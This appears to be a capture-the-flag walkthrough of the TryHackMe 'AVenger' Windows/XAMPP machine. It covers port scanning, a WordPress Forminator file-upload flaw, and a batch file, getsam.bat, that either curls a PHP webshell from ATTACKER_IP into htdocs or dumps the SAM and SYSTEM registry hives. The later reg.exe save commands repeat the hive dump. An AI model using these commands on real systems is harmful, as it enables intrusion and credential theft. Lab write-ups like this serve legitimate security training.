We first, start off with port scanning, with rust scan, you may use nmap if you like!
rustscan -a TARGET_IP -- -A -sC
rustscan output
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.5K 2022-06-15 16:07 applications.html
| 177 2022-06-15 16:07 bitnami.css
| - 2023-04-06 09:24 dashboard/
| 30K 2015-07-16 15:32 favicon.ico
| - 2023-06-27 09:26 gift/
| - 2023-06-27 09:04 img/
| 751 2022-06-15 16:07 img/module_table_bottom.png
| 337 2022-06-15 16:07 img/module_table_top.png
| - 2023-06-28 14:39 xampp/
|_
| http-methods:
| Supported Methods: HEAD GET POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
|_http-title: Index of /
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.5K 2022-06-15 16:07 applications.html
| 177 2022-06-15 16:07 bitnami.css
| - 2023-04-06 09:24 dashboard/
| 30K 2015-07-16 15:32 favicon.ico
| - 2023-06-27 09:26 gift/
| - 2023-06-27 09:04 img/
| 751 2022-06-15 16:07 img/module_table_bottom.png
| 337 2022-06-15 16:07 img/module_table_top.png
| - 2023-06-28 14:39 xampp/
|_
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a44cc99e84b26f9e639f9ed229dee0
| SHA-1: b0238c547a905bfa119c4e8baccaeacf36491ff6
| -----BEGIN CERTIFICATE-----
| MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls
| b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD
| VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj
| 7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o
| J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT
| gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD
| gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd
| aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL
| vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE=
|_-----END CERTIFICATE-----
| http-methods:
| Supported Methods: HEAD GET POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-title: Index of /
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds? syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open msrpc syn-ack Microsoft Windows RPC
49670/tcp open msrpc syn-ack Microsoft Windows RPC
49677/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Hosts: localhost, www.example.com; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 0s
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-11-27T14:58:56
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 34070/tcp): CLEAN (Couldn't connect)
| Check 2 (port 30527/tcp): CLEAN (Couldn't connect)
| Check 3 (port 20406/udp): CLEAN (Timeout)
| Check 4 (port 49744/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
As we can see, there is just too many ports open, but our taget is the web port!, I am gonna try to make this writeup as short as possible.
Visiting the default port 80, we get this page!
Now visiting the dashboard we can only get the phpinfo page from there, but it's not much of a help, so we can try to get the gift endpoint.
It does not load at first instance! gives of an error that its unable to load the page, however look at the url tab.
Now edit your host file so that you can access the site, for example edit your host file as the following
/etc/hosts
target_ip avenger.tryhackme
Now you should be able to access the site. It will take some time to load, since it's a windows machine.
Once loaded, it gives us a wordpress powered site. Use wpscan for enumerating vulnerabilites in the wordpress!
wpscan - plugin enumeration
[+] forminator
| Location: http://avenger.tryhackme/gift/wp-content/plugins/forminator/
| Last Updated: 2023-11-13T09:11:00.000Z
| [!] The version is out of date, the latest version is 1.28.0
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.24.1 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://avenger.tryhackme/gift/wp-content/plugins/forminator/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://avenger.tryhackme/gift/wp-content/plugins/forminator/readme.txt
A simple googling will lead us to the following exploit against forminator
As per the notes in expoit db, we can upload any kind of file on the server, lets try something, use the following training request form to upload your batch file, since we are targeting windows, and it is already mentioned that Antivirus is enabled, we need to be carefull about it.
So we will not be using any reverse shell for this case, but rather a simple webshell, best webshell is powny shell
Download the shell.php in your current directory, and prepare your setup.
I have already enumerated the forminator plugin, and I could not find any valid endpoint where the file gets stored, so don't worry about a reverse shell. Since the backend process will check each message carefully we can expect this attack vector as a simple phishing attack, where we upload a malacious file and it gets executed.
Weaponization
Since we know that the target server is likely using xampp, we can think of its absolute default path as the following:
Default xampp server path
C:\xampp\htdocs
Now we will craft a simple batch file which will check if the user/process that will execute our program is running as "nt /authourity" or not, if its not then download a webshell in htdocs directory, else get the SAM files. Do change the ATTACKER_IP in the script, modify it as per your needs.
getsam.bat
@echo off
:: Check if the current user is NT AUTHORITY\SYSTEM
whoami /groups | find "S-1-5-18" > nul
if %errorlevel% equ 0 (
:: Run commands for NT AUTHORITY\SYSTEM
reg.exe save HKLM\SYSTEM C:\xampp\htdocs\system.bak
reg.exe save HKLM\SAM C:\xampp\htdocs\sam.bak
) else (
:: Run commands for other users
curl http://ATTACKER_IP/powny.php -o C:\xampp\htdocs\shell.php
)
Delivery
Now start the python server in your directory.
Start the server
python -m http.server 80 .
Upload the batch file!
Look for the web request in your python server.
And you have your shell on the server!
Exploitation
VIsit the shell.php, and you will have a powny shell ready for you.
As you can see, if we type whoami, we are admin!
That means we can do whatever we want, like disabling Anti-Virus as well, but we dont need to that. Just get the SAM files, and we will get the admin hashes, later use them to gain access to the system.
use these commands
reg.exe save HKLM\SYSTEM C:\xampp\htdocs\system.bak
reg.exe save HKLM\SAM C:\xampp\htdocs\sam.bak
Now check the root directory, it should have those registry backups
AVengerWriteups
